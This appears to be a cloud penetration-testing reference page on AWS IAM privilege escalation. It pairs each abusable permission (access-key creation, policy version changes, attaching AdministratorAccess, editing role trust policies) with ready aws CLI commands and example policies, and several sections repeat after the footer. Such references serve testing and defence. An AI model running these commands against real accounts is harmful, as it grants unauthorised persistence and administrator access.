Identity Access Management (IAM)

Abusable AWS IAM permissions that can lead to compromise or privilege escalation

iam:CreateAccessKey

With access to these permissions, an attacker can create a set of IAM Access Keys, enabling them to maintain persistent access to a user.

aws iam create-access-key --user-name <userName>

iam:CreatePolicyVersion and iam:SetDefaultPolicyVersion

With access to these permissions, an attacker can create and enable a new IAM permissions policy, escalating their privileges.

aws iam create-policy-version --policy-arn arn:aws:iam::<accountId>:policy/<policyName> --policy-document file://<policyName>.json --set-as-default

# example iam policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "s3:*",
            "Resource": "*"
        }
    ]
}

iam:SetExistingDefaultPolicyVersion

With access to this permission, an attacker can attach a different version of an IAM policy, potentially escalating privileges or gaining access to other resources.

# view available versions of a policy
aws iam list-policy-versions --policy-arn <policyArn>

# view the policy for a particular version
aws iam get-policy-version --policy-arn <policyArn> --version-id <versionId>

# attach a specific version of a policy
aws iam set-default-policy-version --policy-arn <policyArn> --version-id <versionId>

iam:AttachUserPolicy

With access to this permission, an attacker can attach a new policy to an IAM user, potentially escalating privileges or gaining access to other resources.

aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name <userName>

iam:UpdateAssumeRolePolicy

With access to this permission, an attacker can modify an IAM Role's Trust Policy, enabling themselves or another identity (user, role, service) the ability to assume the role, potentially escalating privileges or gaining access to other resources.

aws iam update-assume-role-policy --role-name <roleName> --policy-document file://<trustPolicy>.json

# example trust policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::<accountId>:user/<userName>"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}

PreviousAWS Privilege Escalation NextIAM Trust Policies

Last updated 5 months ago

Was this helpful?

iam:CreatePolicyVersion and iam:SetDefaultPolicyVersion

With access to these permissions, an attacker can create and enable a new IAM permissions policy, escalating their privileges.

aws iam create-policy-version --policy-arn arn:aws:iam::<accountId>:policy/<policyName> --policy-document file://<policyName>.json --set-as-default

# example iam policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "s3:*",
            "Resource": "*"
        }
    ]
}

iam:SetExistingDefaultPolicyVersion

With access to this permission, an attacker can attach a different version of an IAM policy, potentially escalating privileges or gaining access to other resources.

# view available versions of a policy
aws iam list-policy-versions --policy-arn <policyArn>

# view the policy for a particular version
aws iam get-policy-version --policy-arn <policyArn> --version-id <versionId>

# attach a specific version of a policy
aws iam set-default-policy-version --policy-arn <policyArn> --version-id <versionId>

iam:UpdateAssumeRolePolicy

With access to this permission, an attacker can modify an IAM Role's Trust Policy, enabling themselves or another identity (user, role, service) the ability to assume the role, potentially escalating privileges or gaining access to other resources.

aws iam update-assume-role-policy --role-name <roleName> --policy-document file://<trustPolicy>.json

# example trust policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::<accountId>:user/<userName>"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}